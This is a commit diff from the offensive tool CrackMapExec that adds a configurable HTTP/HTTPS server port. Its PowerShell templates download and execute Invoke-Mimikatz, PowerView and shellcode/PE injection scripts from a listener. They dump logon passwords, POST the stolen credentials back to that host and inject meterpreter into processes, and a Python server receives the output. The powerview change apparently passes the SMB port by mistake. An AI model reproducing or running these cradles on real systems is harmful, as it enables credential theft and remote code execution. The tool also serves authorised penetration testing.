Added option to set the HTTP/HTTPS server port (resolves #33)

2015-11-20 19:33:55 -07:00 · 2015-11-20 19:33:55 -07:00 · f0fe1a25a7
parent 0d1e580edd
commit f0fe1a25a7
3 changed files with 42 additions and 25 deletions
--- a/core/powershell.py
+++ b/core/powershell.py
@ -32,9 +32,9 @@ class PowerShell:
    def mimikatz(self, command='privilege::debug sekurlsa::logonpasswords exit'):

        command = """
-        IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Mimikatz.ps1');
+        IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-Mimikatz.ps1');
        $creds = Invoke-{func_name} -Command '{katz_command}';
-        $request = [System.Net.WebRequest]::Create('{protocol}://{addr}/');
+        $request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/');
        $request.Method = 'POST';
        $request.ContentType = 'application/x-www-form-urlencoded';
        $bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
@ -42,8 +42,9 @@ class PowerShell:
        $requestStream = $request.GetRequestStream();
        $requestStream.Write( $bytes, 0, $bytes.Length );
        $requestStream.Close();
-        $request.GetResponse();""".format(protocol=self.protocol, 
-                                          func_name=self.func_name, 
+        $request.GetResponse();""".format(protocol=self.protocol,
+                                          port=settings.args.server_port,
+                                          func_name=self.func_name,
                                          addr=self.localip,
                                          katz_command=command)

@ -52,9 +53,9 @@ class PowerShell:
    def powerview(self, command):

        command = """
-        IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/powerview.ps1');
+        IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/powerview.ps1');
        $output = {view_command} | Out-String;
-        $request = [System.Net.WebRequest]::Create('{protocol}://{addr}/');
+        $request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/');
        $request.Method = 'POST';
        $request.ContentType = 'application/x-www-form-urlencoded';
        $bytes = [System.Text.Encoding]::ASCII.GetBytes($output);
@ -62,7 +63,8 @@ class PowerShell:
        $requestStream = $request.GetRequestStream();
        $requestStream.Write( $bytes, 0, $bytes.Length );
        $requestStream.Close();
-        $request.GetResponse();""".format(protocol=self.protocol, 
+        $request.GetResponse();""".format(protocol=self.protocol,
+                                          port=settings.args.port,
                                          addr=self.localip,
                                          view_command=command)

@ -70,12 +72,13 @@ class PowerShell:

    def inject_meterpreter(self):
        command = """
-        IEX (New-Object Net.WebClient).DownloadString('{0}://{1}/Invoke-Shellcode.ps1');
-        Invoke-{2} -Force -Payload windows/meterpreter/{3} -Lhost {4} -Lport {5}""".format(self.protocol,
+        IEX (New-Object Net.WebClient).DownloadString('{0}://{1}:{2}/Invoke-Shellcode.ps1');
+        Invoke-{3} -Force -Payload windows/meterpreter/{4} -Lhost {5} -Lport {6}""".format(self.protocol,
+                                                                                           settings.args.server_port,
                                                                                           self.localip,
                                                                                           self.func_name,
-                                                                                           settings.args.inject[4:], 
-                                                                                           settings.args.met_options[0], 
+                                                                                           settings.args.inject[4:],
+                                                                                           settings.args.met_options[0],
                                                                                           settings.args.met_options[1])
        if settings.args.procid:
            command += " -ProcessID {}".format(settings.args.procid)
@ -86,10 +89,11 @@ class PowerShell:

    def inject_shellcode(self):
        command = """
-        IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Shellcode.ps1');
+        IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-Shellcode.ps1');
        $WebClient = New-Object System.Net.WebClient;
-        [Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}/{shellcode}');
+        [Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}:{port}/{shellcode}');
        Invoke-{func_name} -Force -Shellcode $bytes""".format(protocol=self.protocol,
+                                                              port=settings.args.server_port,
                                                              func_name=self.func_name,
                                                              addr=self.localip,
                                                              shellcode=settings.args.path.split('/')[-1])
@ -103,11 +107,12 @@ class PowerShell:

    def inject_exe_dll(self):
        command = """
-        IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-ReflectivePEInjection.ps1');
-        Invoke-{func_name} -PEUrl {protocol}://{addr}/{pefile}""".format(protocol=self.protocol,
-                                                                              func_name=self.func_name,
-                                                                              addr=self.localip,
-                                                                              pefile=settings.args.path.split('/')[-1])
+        IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-ReflectivePEInjection.ps1');
+        Invoke-{func_name} -PEUrl {protocol}://{addr}:{port}/{pefile}""".format(protocol=self.protocol,
+                                                                                port=settings.args.server_port,
+                                                                                func_name=self.func_name,
+                                                                                addr=self.localip,
+                                                                                pefile=settings.args.path.split('/')[-1])

        if settings.args.procid:
            command += " -ProcID {}"
--- a/core/servers/mimikatz.py
+++ b/core/servers/mimikatz.py
@ -89,14 +89,14 @@ class MimikatzServer(BaseHTTPRequestHandler):
            for line in buf:
                print_att(line.strip())

-def http_server():
-    http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer)
+def http_server(port):
+    http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer)
    t = Thread(name='http_server', target=http_server.serve_forever)
    t.setDaemon(True)
    t.start()

-def https_server():
-    https_server = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), MimikatzServer)
+def https_server(port):
+    https_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer)
    https_server.socket = ssl.wrap_socket(https_server.socket, certfile='certs/crackmapexec.crt', keyfile='certs/crackmapexec.key', server_side=True)
    t = Thread(name='https_server', target=https_server.serve_forever)
    t.setDaemon(True)
--- a/crackmapexec.py
+++ b/crackmapexec.py
@ -72,7 +72,7 @@ parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Spe
 parser.add_argument('--kerb', action="store_true", dest='kerb', help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters')
 parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
 parser.add_argument("--server", choices={'http', 'https'}, default='http', help='Use the selected server (defaults to http)')
-#parser.add_argument("--server-port", type=int, help='Start the server on the specified port')
+parser.add_argument("--server-port", type=int, help='Start the server on the specified port')

 #How much fail can we limit? can we fail at failing to limit? da da da dum
 parser.add_argument("--fail-limit", metavar='LIMIT', type=int, default=None, help='The max number of failed login attempts allowed per host (default: None)')
@ -150,6 +150,18 @@ args.target = args.target[0]
 patterns    = []
 targets     = []

+if args.server == 'http':
+    if args.server_port:
+        args.http_port = args.server_port
+    else:
+        args.server_port = 80
+
+if args.server == 'https':
+    if args.server_port:
+        args.https_port = args.server_port
+    else:
+        args.server_port = 443
+
 init_args(args)

 if args.verbose:
@ -245,10 +257,10 @@ else:

 if args.mimikatz or args.powerview or args.mimikatz_cmd or args.inject or args.ntds == 'ninja':
    if args.server == 'http':
-        http_server()
+        http_server(args.server_port)

    elif args.server == 'https':
-        https_server()
+        https_server(args.server_port)

 def concurrency(targets):
    '''